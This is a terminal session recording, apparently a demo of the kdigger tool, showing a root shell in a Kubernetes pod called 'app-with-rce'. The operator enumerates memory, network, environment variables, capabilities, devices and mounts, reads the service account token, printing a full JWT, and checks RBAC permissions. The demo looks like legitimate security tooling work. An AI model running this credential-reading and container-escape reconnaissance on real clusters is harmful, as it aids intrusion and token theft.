[37.178794, "o", "\r\u001b[K\u0007\r\u001b[K\u001b[7m(END)\u001b[27m\u001b[K"]
[37.211032, "o", "\r\u001b[K\u0007\r\u001b[K\u001b[7m(END)\u001b[27m\u001b[K"]
[37.238912, "o", "\r\u001b[K\u0007\r\u001b[K\u001b[7m(END)\u001b[27m\u001b[K"]
[37.268944, "o", "\r\u001b[K\u0007\r\u001b[K\u001b[7m(END)\u001b[27m\u001b[K"]
[37.300588, "o", "\r\u001b[K\u0007\r\u001b[K\u001b[7m(END)\u001b[27m\u001b[K"]
[37.330122, "o", "\r\u001b[K"]
[37.330294, "o", "\u0007\r\u001b[K\u001b[7m(END)\u001b[27m\u001b[K"]
[37.360049, "o", "\r\u001b[K\u0007\r\u001b[K\u001b[7m(END)\u001b[27m\u001b[K"]
[37.395432, "o", "\r\u001b[K\u0007\r\u001b[K\u001b[7m(END)\u001b[27m\u001b[K"]
[40.107802, "o", "\r\u001b[K\u001b[?1l\u001b>\u001b[?1049l\u001b[23;0;0t"]
[40.108289, "o", "\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[41.635354, "o", "f"]
[41.828068, "o", "r"]
[41.888992, "o", "e"]
[42.051942, "o", "e"]
[42.122195, "o", " "]
[42.248689, "o", "-"]
[42.663912, "o", "h"]
[42.861091, "o", "\r\n"]
[42.861471, "o", "              total        used        free      shared  buff/cache   available\r\nMem:          1.9Gi       670Mi       117Mi       645Mi       1.2Gi       522Mi"]
[42.861922, "o", "\r\nSwap:            0B          0B          0B\r\n"]
[42.862396, "o", "\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[44.90199, "o", "i"]
[44.927632, "o", "p"]
[45.059224, "o", " "]
[45.242512, "o", "-"]
[45.34723, "o", "c"]
[45.42588, "o", " "]
[45.543825, "o", "a"]
[45.665459, "o", "\r\n"]
[45.680312, "o", "1: \u001b[36mlo: \u001b[0m<LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\r\n"]
[45.68088, "o", "    link/loopback \u001b[33m00:00:00:00:00:00\u001b[0m brd \u001b[33m00:00:00:00:00:00\u001b[0m\r\n"]
[45.68305, "o", "    inet \u001b[35m127.0.0.1\u001b[0m/8 scope host lo\r\n       valid_lft forever preferred_lft forever\r\n2: \u001b[36msit0@NONE: \u001b[0m<NOARP> mtu 1480 qdisc noop state \u001b[31mDOWN \u001b[0mgroup default qlen 1000\r\n    link/sit \u001b[33m0.0.0.0\u001b[0m brd \u001b[33m0.0.0.0\u001b[0m\r\n6: \u001b[36meth0@if7: \u001b[0m<BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state \u001b[32mUP \u001b[0mgroup default \r\n"]
[45.684573, "o", "    link/ether \u001b[33m02:42:ac:11:00:02\u001b[0m brd \u001b[33mff:ff:ff:ff:ff:ff\u001b[0m link-netnsid 0"]
[45.685031, "o", "\r\n"]
[45.6867, "o", "    inet \u001b[35m172.17.0.2\u001b[0m/16 brd \u001b[35m172.17.255.255 \u001b[0mscope global eth0\r\n"]
[45.686797, "o", "       valid_lft forever preferred_lft forever"]
[45.688263, "o", "\r\n\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[48.885249, "o", "e"]
[48.963462, "o", "n"]
[49.064226, "o", "v"]
[49.16824, "o", "\r\n"]
[49.17172, "o", "KUBERNETES_SERVICE_PORT_HTTPS=443\r\n"]
[49.17275, "o", "KUBERNETES_SERVICE_PORT=443"]
[49.173015, "o", "\r\nHOSTNAME=app-with-rce\r\nKUBELETCTL_VERSION=v1.8"]
[49.173308, "o", "\r\nPWD=/\r\nHOME=/root\r\n"]
[49.173577, "o", "KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443"]
[49.173973, "o", "\r\nLS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;"]
[49.174026, "o", "35"]
[49.174363, "o", ":*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:\r\nSTERN_VERSION=1.11.0\r\nLESSCLOSE=/usr/bin/lesspipe %s %s\r\nTERM=xterm"]
[49.174727, "o", "\r\nLESSOPEN=| /usr/bin/lesspipe %s\r\nSHLVL=1"]
[49.175068, "o", "\r\nKUBERNETES_PORT_443_TCP_PROTO=tcp\r\n"]
[49.17545, "o", "KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1\r\nKUBERNETES_SERVICE_HOST=10.96.0.1\r\nKUBERNETES_PORT=tcp://10.96.0.1:443\r\nKUBERNETES_PORT_443_TCP_PORT=443\r\nPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"]
[49.175755, "o", "\r\n_=/usr/bin/env\r\n"]
[49.176355, "o", "\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[54.463614, "o", "c"]
[54.55378, "o", "a"]
[54.774958, "o", "t"]
[54.862915, "o", " "]
[55.043516, "o", "/"]
[55.164248, "o", "r"]
[55.384809, "o", "u"]
[55.453655, "o", "n"]
[55.808126, "o", "/"]
[56.008593, "o", "s"]
[56.7059, "o", "e"]
[56.850242, "o", "crets/"]
[57.242727, "o", "kubernetes.io/"]
[57.562016, "o", "serviceaccount/"]
[58.333272, "o", "t"]
[58.412812, "o", "o"]
[58.557012, "o", "ken "]
[58.919321, "o", "\r\n"]
[58.925242, "o", "eyJhbGciOiJSUzI1NiIsImtpZCI6ImJ2SzAzc2RfSWdzUFJlOXZ5ZVNyZ1prYTZfXzVNOXl6Q3o0VC1ZVGtoNU0ifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNjYyODA0MjQwLCJpYXQiOjE2MzEyNjgyNDAsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJhcHAtd2l0aC1yY2UiLCJ1aWQiOiJkMmQxODQ4MC03YjNlLTQ2NjktODMyMC05MzA2YzZhNTdkNWEifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6ImRlZmF1bHQiLCJ1aWQiOiJiYjZiNTc1Yi1hNWUzLTRhNDktOGQ5Zi0yM2IxMGFlNTA5NDMifSwid2FybmFmdGVyIjoxNjMxMjcxODQ3fSwibmJmIjoxNjMxMjY4MjQwLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6ZGVmYXVsdDpkZWZhdWx0In0.bkOQQCybXBldAR-96WHvXMmJKG_HPcF6VJfOV6HNXZOCqzKFvbcTGq6Tnd0QIpPWWY_1xe7h2oRIhfdZlxDIBsKY__gTH0ZxjHGO9zYDHxECu30JBZritBwBSP32RFPxRYRZDATywFtj0a4OOmLxqoLmNWmWFyDWigidImob9Lf150Tza2HVJfaxJMM4Z8FAXIIosNPffTgAdzoSQG8NUiwGKOUGuIFhXrEX8lFNL0e-fUOpY-so3T-7x2q2T0N1Bu28i5K3FlJJaQVpuAKuB_2n57_elc6EOx7Ya6kpEcU3JUtY9ZiFTr3Gomdn6VzyGPtmWizPnk12fUorQtzeaQ"]
[58.927677, "o", "\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# \u001b[K"]
[59.818106, "o", "\r\n"]
[59.82051, "o", "\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[60.717365, "o", "k"]
[60.906854, "o", "u"]
[60.949607, "o", "b"]
[61.016654, "o", "e"]
[61.075218, "o", "c"]
[61.310916, "o", "t"]
[61.38502, "o", "l"]
[61.532663, "o", " "]
[61.580992, "o", "a"]
[61.710022, "o", "u"]
[61.790625, "o", "t"]
[61.866693, "o", "h"]
[62.03779, "o", " "]
[62.157682, "o", "c"]
[62.212111, "o", "a"]
[62.300499, "o", "n"]
[62.532038, "o", "-"]
[62.742181, "o", "i"]
[62.828851, "o", " "]
[62.941967, "o", "-"]
[63.373808, "o", "-"]
[63.572587, "o", "l"]
[63.770877, "o", "i"]
[63.854517, "o", "s"]
[63.907109, "o", "t"]
[64.032063, "o", "\r\n"]
[64.170197, "o", "Resources                                       Non-Resource URLs                     Resource Names   Verbs\r\nselfsubjectaccessreviews.authorization.k8s.io   []                                    []               [create]\r\nselfsubjectrulesreviews.authorization.k8s.io    []                                    []               [create]\r\n                                                [/.well-known/openid-configuration]   []               [get]\r\n                                                [/api/*]                              []               [get]\r\n                                                [/api]                                []               [get]\r\n                                                [/apis/*]                             []               [get]\r\n                                                [/apis]                               []               [get]\r\n        "]
[64.170554, "o", "                                        [/healthz]                            []               [get]\r\n                                                [/healthz]                            []               [get]\r\n                                                [/livez]                              []               [get]\r\n                                                [/livez]                              []               [get]\r\n                                                [/openapi/*]                          []               [get]\r\n                                                [/openapi]                            []               [get]\r\n                                                [/openid/v1/jwks]                     []               [get]\r\n                                                [/readyz]                             []               [get]\r\n                                                [/readyz]                             []               [get]\r\n                                          "]
[64.170666, "o", "      [/version/]                           []               [get]\r\n                                                [/version/]                           []               [get]\r\n                                                [/version]                            []               [get]\r\n                                                [/version]                            []               [get]\r\n"]
[64.17251, "o", "\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[67.563627, "o", "c"]
[67.614862, "o", "a"]
[67.706282, "o", "p"]
[67.814247, "o", "s"]
[67.953139, "o", "h"]
[68.174845, "o", " "]
[68.755414, "o", "-"]
[68.906274, "o", "-"]
[69.292451, "o", "p"]
[69.402837, "o", "r"]
[69.514705, "o", "i"]
[69.565915, "o", "n"]
[69.669301, "o", "t"]
[70.097151, "o", "\r\n"]
[70.10531, "o", "Current: =eip\r\nBounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read"]
[70.1063, "o", "\r\nAmbient set =\r\nSecurebits: 00/0x0/1'b0\r\n secure-noroot: no (unlocked)\r\n secure-no-suid-fixup: no (unlocked)\r\n secure-keep-caps: no (unlocked)\r\n"]
[70.106893, "o", " secure-no-ambient-raise: no (unlocked)"]
[70.108322, "o", "\r\n"]
[70.110691, "o", "uid=0(root) euid=0(root)"]
[70.112167, "o", "\r\n"]
[70.113983, "o", "gid=0(root)\r\ngroups=\r\nGuessed mode: UNCERTAIN (0)\r\n"]
[70.115915, "o", "\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[72.687662, "o", "d"]
[72.774851, "o", "f"]
[72.844087, "o", " "]
[72.964196, "o", "-"]
[73.217666, "o", "h"]
[74.110036, "o", "\r\n"]
[74.11543, "o", "Filesystem      Size  Used Avail Use% Mounted on\r\noverlay         3.5G  1.9G  1.4G  57% /\r\ntmpfs            64M     0   64M   0% /dev\r\ntmpfs           993M     0  993M   0% /sys/fs/cgroup\r\n/dev/sda1       3.5G  1.9G  1.4G  57% /etc/hosts\r\nshm              64M     0   64M   0% /dev/shm\r\ntmpfs           2.0G   12K  2.0G   1% /run/secrets/kubernetes.io/serviceaccount\r\n"]
[74.117021, "o", "\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[75.245911, "o", "l"]
[75.294507, "o", "s"]
[75.365983, "o", " "]
[75.560213, "o", "/"]
[75.686068, "o", "d"]
[75.686688, "o", "e"]
[75.882493, "o", "v"]
[76.56478, "o", "\r\n"]
[76.573171, "o", "\u001b[0m\u001b[40;33;01mautofs\u001b[0m           \u001b[40;33;01mfull\u001b[0m          \u001b[40;33;01mloop0\u001b[0m  \u001b[40;33;01mloop7\u001b[0m             \u001b[40;33;01mnetwork_throughput\u001b[0m  \u001b[40;33;01mrfkill\u001b[0m  \u001b[40;33;01msnapshot\u001b[0m         \u001b[40;33;01mtty\u001b[0m    \u001b[40;33;01mtty14\u001b[0m  \u001b[40;33;01mtty20\u001b[0m  \u001b[40;33;01mtty27\u001b[0m  \u001b[40;33;01mtty33\u001b[0m  \u001b[40;33;01mtty4\u001b[0m   \u001b[40;33;01mtty46\u001b[0m  \u001b[40;33;01mtty52\u001b[0m  \u001b[40;33;01mtty59\u001b[0m  \u001b[40;33;01mtty8\u001b[0m     \u001b[40;33;01musbmon0\u001b[0m    \u001b[40;33;01mvcs4\u001b[0m   \u001b[40;33;01mvcsa4\u001b[0m  \u001b[40;33;01mvcsu4\u001b[0m\r\n\u001b[01;34mbsg\u001b[0m              \u001b[40;33;01mfuse\u001b[0m          \u001b[40;33;01mloop1\u001b[0m  \u001b[01;34mmapper\u001b[0m            \u001b[40;33;01mnull\u001b[0m                \u001b[40;33;01mrtc0\u001b[0m    \u001b[01;34msnd\u001b[0m              \u001b[40;33;01mtty0\u001b[0m   \u001b[40;33;01mtty15\u001b[0m  \u001b[40;33;01mtty21\u001b[0m  \u001b[40;33;01mtty28\u001b[0m  \u001b[40;33;01mtty34\u001b[0m  \u001b[40;33;01mtty40\u001b[0m  \u001b[40;33;01mtty47\u001b[0m  \u001b[40;33;01mtty53\u001b[0m  \u001b[40;33;01mtty6\u001b[0m   \u001b[40;33;01mtty9\u001b[0m     \u001b[40;33;01mvboxguest\u001b[0m  \u001b[40;33;01mvcs5\u001b[0m   \u001b[40;33;01mvcsa5\u001b[0m  \u001b[40;33;01m"]
[76.573729, "o", "vcsu5\u001b[0m\r\n\u001b[40;33;01mbtrfs-control\u001b[0m    \u001b[40;33;01mhpet\u001b[0m          \u001b[40;33;01mloop2\u001b[0m  \u001b[40;33;01mmem\u001b[0m               \u001b[40;33;01mnvram\u001b[0m               \u001b[40;33;01msda\u001b[0m     \u001b[40;33;01msr0\u001b[0m              \u001b[40;33;01mtty1\u001b[0m   \u001b[40;33;01mtty16\u001b[0m  \u001b[40;33;01mtty22\u001b[0m  \u001b[40;33;01mtty29\u001b[0m  \u001b[40;33;01mtty35\u001b[0m  \u001b[40;33;01mtty41\u001b[0m  \u001b[40;33;01mtty48\u001b[0m  \u001b[40;33;01mtty54\u001b[0m  \u001b[40;33;01mtty60\u001b[0m  \u001b[40;33;01mttyS0\u001b[0m    \u001b[40;33;01mvboxuser\u001b[0m   \u001b[40;33;01mvcs6\u001b[0m   \u001b[40;33;01mvcsa6\u001b[0m  \u001b[40;33;01mvcsu6\u001b[0m\r\n\u001b[01;36mcore\u001b[0m             \u001b[40;33;01mhwrng\u001b[0m         \u001b[40;33;01mloop3\u001b[0m  \u001b[40;33;01mmemory_bandwidth\u001b[0m  \u001b[40;33;01mport\u001b[0m                \u001b[40;33;01msda1\u001b[0m    \u001b[01;36mstderr\u001b[0m           \u001b[40;33;01mtty10\u001b[0m  \u001b[40;33;01mtty17\u001b[0m  \u001b[40;33;01mtty23\u001b[0m  \u001b[40;33;01mtty3\u001b[0m   \u001b[40;33;01mtty36\u001b[0m  \u001b[40;33;01mtty42\u001b[0m  \u001b[40;33;01mtty49\u001b[0m  \u001b[40;33;01mtty55\u001b[0m  \u001b[40;33;01mtty61\u001b[0m  \u001b[40;33;01mttyS1\u001b[0m    \u001b[40;33;01mvcs\u001b[0m        \u001b[40;33;01mvcsa\u001b[0m   \u001b[40;33;01mvcsu\u001b[0m   \u001b"]
[76.573832, "o", "[40;33;01mvga_arbiter\u001b[0m\r\n\u001b[01;34mcpu\u001b[0m              \u001b[01;34minput\u001b[0m         \u001b[40;33;01mloop4\u001b[0m  \u001b[30;42mmqueue\u001b[0m            \u001b[01;36mptmx\u001b[0m                \u001b[40;33;01msg0\u001b[0m     \u001b[01;36mstdin\u001b[0m            \u001b[40;33;01mtty11\u001b[0m  \u001b[40;33;01mtty18\u001b[0m  \u001b[40;33;01mtty24\u001b[0m  \u001b[40;33;01mtty30\u001b[0m  \u001b[40;33;01mtty37\u001b[0m  \u001b[40;33;01mtty43\u001b[0m  \u001b[40;33;01mtty5\u001b[0m   \u001b[40;33;01mtty56\u001b[0m  \u001b[40;33;01mtty62\u001b[0m  \u001b[40;33;01mttyS2\u001b[0m    \u001b[40;33;01mvcs1\u001b[0m       \u001b[40;33;01mvcsa1\u001b[0m  \u001b[40;33;01mvcsu1\u001b[0m  \u001b[40;33;01mvhost-net\u001b[0m\r\n\u001b[40;33;01mcpu_dma_latency\u001b[0m  \u001b[40;33;01mkmsg\u001b[0m          \u001b[40;33;01mloop5\u001b[0m  \u001b[01;34mnet\u001b[0m               \u001b[01;34mpts\u001b[0m                 \u001b[40;33;01msg1\u001b[0m     \u001b[01;36mstdout\u001b[0m           \u001b[40;33;01mtty12\u001b[0m  \u001b[40;33;01mtty19\u001b[0m  \u001b[40;33;01mtty25\u001b[0m  \u001b[40;33;01mtty31\u001b[0m  \u001b[40;33;01mtty38\u001b[0m  \u001b[40;33;01mtty44\u001b[0m  \u001b[40;33;01mtty50\u001b[0m  \u001b[40;33;01mtty57\u001b[0m  \u001b[40;33;01mtty63\u001b[0m  \u001b[40;33;01mttyS3\u001b[0m    \u001b[40;33;01mvcs2\u001b[0m       \u001b[40;33;01mvcsa2\u001b[0m  \u001b[40;33;01mvcsu2\u001b[0m "]
[76.574069, "o", " \u001b[40;33;01mvhost-vsock\u001b[0m\r\n\u001b[01;36mfd\u001b[0m               \u001b[40;33;01mloop-control\u001b[0m  \u001b[40;33;01mloop6\u001b[0m  \u001b[40;33;01mnetwork_latency\u001b[0m   \u001b[40;33;01mrandom\u001b[0m              \u001b[30;42mshm\u001b[0m     termination-log  \u001b[40;33;01mtty13\u001b[0m  \u001b[40;33;01mtty2\u001b[0m   \u001b[40;33;01mtty26\u001b[0m  \u001b[40;33;01mtty32\u001b[0m  \u001b[40;33;01mtty39\u001b[0m  \u001b[40;33;01mtty45\u001b[0m  \u001b[40;33;01mtty51\u001b[0m  \u001b[40;33;01mtty58\u001b[0m  \u001b[40;33;01mtty7\u001b[0m   \u001b[40;33;01murandom\u001b[0m  \u001b[40;33;01mvcs3\u001b[0m       \u001b[40;33;01mvcsa3\u001b[0m  \u001b[40;33;01mvcsu3\u001b[0m  \u001b[40;33;01mzero\u001b[0m\r\n"]
[76.575164, "o", "\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[78.46992, "o", "m"]
[78.68021, "o", "o"]
[78.738527, "o", "u"]
[78.938638, "o", "n"]
[79.007771, "o", "t"]
[80.037487, "o", "\r\n"]
[80.056299, "o", "overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/CRJ24NDYS6DAYOQOUEBLFYEYLT:/var/lib/docker/overlay2/l/XGOLF7UDE5WZNGKCUL5LSZP55S:/var/lib/docker/overlay2/l/HXZUWDILE3YSGG5MPOCZR6BNWZ:/var/lib/docker/overlay2/l/ZA6QTWLVKFOZ2IHJ4HDS7SEOJY:/var/lib/docker/overlay2/l/KK3DIQHTOHTVBT5HBSPNCZQVU5:/var/lib/docker/overlay2/l/BWYBEF44G5A5W4UR3KL47CDTAG:/var/lib/docker/overlay2/l/4F6RLRRFDHXAYLZNLKQ44YOTV7:/var/lib/docker/overlay2/l/LU7JHFDOZ2OFEIFFFVQEGTJ23F:/var/lib/docker/overlay2/l/LWFXM7U7OZ3W5KPOZJMHB62K3E:/var/lib/docker/overlay2/l/XKAJKPZTX6TVKKREPPU2BTS4R4,upperdir=/var/lib/docker/overlay2/6329a77e6157b117b65beba7a4b07711a60394649aaf29f7117cd48047c05353/diff,workdir=/var/lib/docker/overlay2/6329a77e6157b117b65beba7a4b07711a60394649aaf29f7117cd48047c05353/work)\r\nproc on /proc type proc (rw,nosuid,nodev,noexec,relatime)\r\ntmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)\r\ndevpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)\r\nsysfs on /sys type sy"]
[80.056597, "o", "sfs (rw,nosuid,nodev,noexec,relatime)\r\ntmpfs on /sys/fs/cgroup type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755)\r\ncgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd)\r\ncgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)\r\ncgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)\r\n"]
[80.057826, "o", "cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)\r\n"]
[80.05919, "o", "cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)\r\ncgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)"]
[80.060512, "o", "\r\ncgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)\r\n"]
[80.062068, "o", "cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)"]
[80.062939, "o", "\r\n"]
[80.065334, "o", "cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)"]
[80.065575, "o", "\r\ncgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)\r\ncgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)\r\nmqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)\r\n/dev/sda1 on /root/.scripts type ext4 (ro,relatime)\r\n/dev/sda1 on /dev/termination-log type ext4 (rw,relatime)\r\n/dev/sda1 on /etc/resolv.conf type ext4 (rw,relatime)\r\n/dev/sda1 on /etc/hostname type ext4 (rw,relatime)\r\n/dev/sda1 on /etc/hosts type ext4 (rw,relatime)\r\nshm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)\r\ntmpfs on /run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime,size=2033280k)\r\n"]
[80.066604, "o", "\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[85.735981, "o", "\u001b[H\u001b[2J\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[86.814034, "o", "k"]
[86.875061, "o", "d"]
[86.958894, "o", "igger "]
[87.523419, "o", "d"]
[87.627211, "o", "i"]
[87.720258, "o", "g"]
[87.826588, "o", " "]
[87.91738, "o", "a"]
[88.017816, "o", "l"]
[88.133971, "o", "l"]
[88.238345, "o", " "]
[88.397704, "o", "-"]
[88.610403, "o", "c"]
[88.897555, "o", "\b \b"]
[89.001616, "o", "-"]
[89.131936, "o", "c"]
[89.256208, "o", "o"]
[89.41357, "o", "l"]
[89.543321, "o", "o"]
[89.626053, "o", "r"]
[89.743193, "o", "="]
[89.875207, "o", "f"]
[89.907191, "o", "a"]
[90.05089, "o", "l"]
[90.068295, "o", "s"]
[90.243664, "o", "e"]
[90.349052, "o", " "]
[90.608546, "o", "|"]
[90.748564, "o", " "]
[90.860103, "o", "l"]
[90.91756, "o", "e"]
[91.083677, "o", "s"]
[91.243662, "o", "s"]
[92.897709, "o", "\r\n"]
[92.902758, "o", "\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\r"]
[92.987744, "o", "### AUTHORIZATION ###\r\nComment: Checking current context/token permissions in the \"default\" namespace.\r\n+---------------------------------+---------------------------------+----------------+----------+\r\n|            RESOURCES            |         NONRESOURCEURLS         | RESSOURCENAMES |   VERBS  |\r\n+---------------------------------+---------------------------------+----------------+----------+\r\n| selfsubjectaccessreviews.author | []                              | []             | [create] |\r\n| ization.k8s.io                  |                                 |                |          |\r\n| selfsubjectrulesreviews.authori | []                              | []             | [create] |\r\n| zation.k8s.io                   |                                 |                |          |\r\n|                                 | [/.well-known/openid-configurat | []             | [get]    |\r\n|                                 | ion]                            |                |          |\r\n|                            "]
[92.98786, "o", "     | [/api/*]                        | []             | [get]    |\r\n|                                 | [/api]                          | []             | [get]    |\r\n|                                 | [/apis/*]                       | []             | [get]    |\r\n|                                 | [/apis]                         | []             | [get]    |\r\n|                                 | [/healthz]                      | []             | [get]    |\r\n|                                 | [/healthz]                      | []             | [get]    |\r\n|                                 | [/livez]                        | []             | [get]    |\r\n|                                 | [/livez]                        | []             | [get]    |\r\n|                                 | [/openapi/*]                    | []             | [get]    |\r\n|                                 | [/openapi]                      | []             | [get]    |\r\n|                                 | [/openid/v1/jwks]          "]
[92.98794, "o", "     | []             | [get]    |\r\n|                                 | [/readyz]                       | []             | [get]    |\r\n|                                 | [/readyz]                       | []             | [get]    |\r\n|                                 | [/version/]                     | []             | [get]    |\r\n|                                 | [/version/]                     | []             | [get]    |\r\n|                                 | [/version]                      | []             | [get]    |\r\n|                                 | [/version]                      | []             | [get]    |\r\n+---------------------------------+---------------------------------+----------------+----------+\r\n### CAPABILITIES ###\r\nComment: The bounding set contains 38 caps and you have CAP_SYS_ADMIN, you might be running a privileged container, check the number of devices available.\r\n+-------------+--------------------------------------------------------------------+\r\n|     SET     |                "]
[92.987974, "o", "            CAPABILITIES     "]
[92.988133, "o", "                       |\r\n+-------------+--------------------------------------------------------------------+\r\n| effective   | [chown dac_override dac_read_search fowner fsetid kill setgid      |\r\n|             | setuid setpcap linux_immutable net_bind_service net_broadcast      |\r\n|             | net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio          |\r\n|             | sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice        |\r\n|             | sys_resource sys_time sys_tty_config mknod lease audit_write       |\r\n|             | audit_control setfcap mac_override mac_admin syslog wake_alarm     |\r\n|             | block_suspend audit_read]                                          |\r\n| permitted   | [chown dac_override dac_read_search fowner fsetid kill setgid      |\r\n|             | setuid setpcap linux_immutable net_bind_service net_broadcast      |\r\n|             | net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio          |\r\n|             | sys_chroot sys_ptrace sys_pacct sys_"]
[92.988161, "o", "admin sys_boot sys_nice        |\r\n|             | sys_resource sys_time sys_tty_config mknod lease audit_write       |\r\n|             | audit_control setfcap mac_override mac_admin syslog wake_alarm     |\r\n|             | block_suspend audit_read]                                          |\r\n| inheritable | [chown dac_override dac_read_search fowner fsetid kill setgid      |\r\n|             | setuid setpcap linux_immutable net_bind_service net_broadcast      |\r\n|             | net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio          |\r\n:\u001b[K"]
[97.979127, "o", "\r\u001b[K|             | sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice        |\r\n:\u001b[K"]
[98.482588, "o", "\r\u001b[K|             | sys_resource sys_time sys_tty_config mknod lease audit_write       |\r\n:\u001b[K"]
[98.514148, "o", "\r\u001b[K|             | audit_control setfcap mac_override mac_admin syslog wake_alarm     |\r\n:\u001b[K"]
[98.544789, "o", "\r\u001b[K|             | block_suspend audit_read]                                          |\r\n:\u001b[K"]
